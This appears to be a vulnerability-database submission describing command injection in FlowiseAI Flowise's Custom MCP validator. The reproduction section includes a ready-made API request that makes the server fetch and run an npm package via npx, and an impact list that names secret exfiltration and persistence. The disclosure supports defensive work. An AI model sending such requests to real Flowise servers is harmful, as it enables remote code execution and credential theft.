| 标题 | FlowiseAI Flowise <= 3.0.12 OS Command Injection (CWE-78) |
|---|
| 描述 | # Technical Details
A Remote Code Execution vulnerability exists in the Custom MCP (Model Context Protocol) component's `validateMCPServerConfig()` in `packages/components/nodes/tools/MCP/core.ts` of FlowiseAI Flowise.
The command allowlist includes 'npx' which is an arbitrary code execution tool. When a user configures {"command":"npx","args":["-y","attacker-malicious-package"]}, the validation passes because npx is in the allowedCommands list and the args contain no dangerous patterns. This triggers child_process.spawn('npx', ['-y', 'attacker-malicious-package']) which downloads and executes arbitrary npm packages from the public registry with full server process privileges.
# Vulnerable Code
File: packages/components/nodes/tools/MCP/core.ts (line 269)
Method: validateMCPServerConfig()
Why: The allowedCommands list ['node', 'npx', 'python', 'python3', 'docker'] includes 'npx' which can download and execute arbitrary code. The argument validation (validateArgsForLocalFileAccess and validateCommandInjection) cannot detect this because package names are plain strings.
# Reproduction
1. Deploy Flowise: docker run -d --name flowise-test -p 3001:3000 flowiseai/flowise:latest
2. Authenticate and get JWT cookie.
3. Send malicious MCP config: POST /api/v1/node-load-method/customMCP with {"loadMethod":"listActions","inputs":{"mcpServerConfig":"{\"command\":\"npx\",\"args\":[\"-y\",\"cowsay\"]}"}}
4. Verify execution: docker exec flowise-test ls -la /root/.npm/_npx/ shows npx cache directory created.
# Impact
- Full Remote Code Execution on the Flowise server.
- Exfiltrate secrets (.env file, database credentials, LLM API keys).
- Install persistence (cron jobs, SSH keys, backdoors).
- Lateral movement via leaked credentials. |
|---|
| 来源 | ⚠️ https://gist.github.com/YLChen-007/4442c386739b2087db1473be703b4ccd |
|---|
| 用户 | Eric-a (UID 96353) |
|---|
| 提交 | 2026-03-11 15時04分 (3 月前) |
|---|
| 管理 | 2026-05-06 09時40分 (2 months later) |
|---|
| 状态 | 重复 |
|---|
| VulDB条目 | 358753 [FlowiseAI Flowise 直到 3.0.x /tmp/pwn 权限提升] |
|---|
| 积分 | 0 |
|---|